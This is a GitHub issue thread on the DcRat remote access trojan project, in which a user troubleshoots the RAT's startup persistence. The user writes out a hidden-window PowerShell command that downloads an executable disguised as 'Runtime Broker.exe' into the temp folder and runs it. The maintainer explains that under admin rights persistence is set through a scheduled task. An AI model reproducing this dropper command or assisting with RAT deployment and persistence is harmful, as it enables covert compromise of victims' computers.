### ISSUE TITLE
Install on startup fails to execute when run as admin

### ISSUE THREAD

**Issue by LelouchViBri** [qwqdanchun/DcRat#31]
**Describe the bug**
Install on startup fails to execute when run as admin with powershell

**To Reproduce**
1. run powershell as administrator
2. add a command to download and execute, the command below for example:
powershell.exe -windowstyle hidden -Command (new-object System.Net.WebClient).DownloadFile('URL',$env:TEMP+'/Runtime Broker.exe');(New-Object -com Shell.Application).ShellExecute($env:TEMP+'/Runtime Broker.exe')

**Expected behavior**
install on startup to work

**Comment by qwqdanchun** [comment]
is there any anti-virus software on your PC

**Comment by qwqdanchun** [comment]
try disable startup when you build the client,what happen then

**Comment by LelouchViBri** [comment]
if i disable startup then the rat just connects, if i enable startup and run a command with powershell and admin privileges then the rat just connects but not adding anything on startup

**Comment by LelouchViBri** [comment]
https://streamable.com/ar7dx7
here is a preview of it

**Comment by qwqdanchun** [comment]
check your schtasks

if admin,it will add a schtasks instead of registry

**Comment by LelouchViBri** [comment]
i see, yeah it's working fine, it adds a task, thanks for clarifying that!
